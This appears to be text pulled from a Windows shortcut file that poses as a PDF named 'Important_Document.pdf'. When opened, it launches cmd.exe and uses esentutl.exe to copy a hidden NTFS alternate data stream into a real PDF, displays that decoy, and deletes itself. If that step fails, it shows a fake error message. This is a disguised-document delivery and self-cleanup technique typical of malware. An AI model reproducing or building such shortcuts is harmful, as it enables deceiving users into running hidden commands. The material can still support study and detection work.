WINDOWS
system32
cmd.exe
%SystemRoot%\System32\shell32.dll
WINDOWS
system32
cmd.exe
!..\..\..\WINDOWS\system32\cmd.exe
%windir%\system32
/c esentutl.exe /y "%cd%\Important_Document.pdf.lnk:PDF.pdf" /d "%cd%\Important_Document.pdf" /o & IF EXIST "%cd%\Important_Document.pdf" (start "" "%cd%\Important_Document.pdf" & del "%cd%\Important_Document.pdf.lnk") ELSE msg * "Cannot open file, please extract manually."C:\Windows\System32\shell32.dll
%SystemRoot%\System32\shell32.dll
system32 (C:\WINDOWS)
S-1-5-21-22571052-1895480835-1497358984-500
esentutl.exe
Application
C:\WINDOWS\system32\esentutl.exe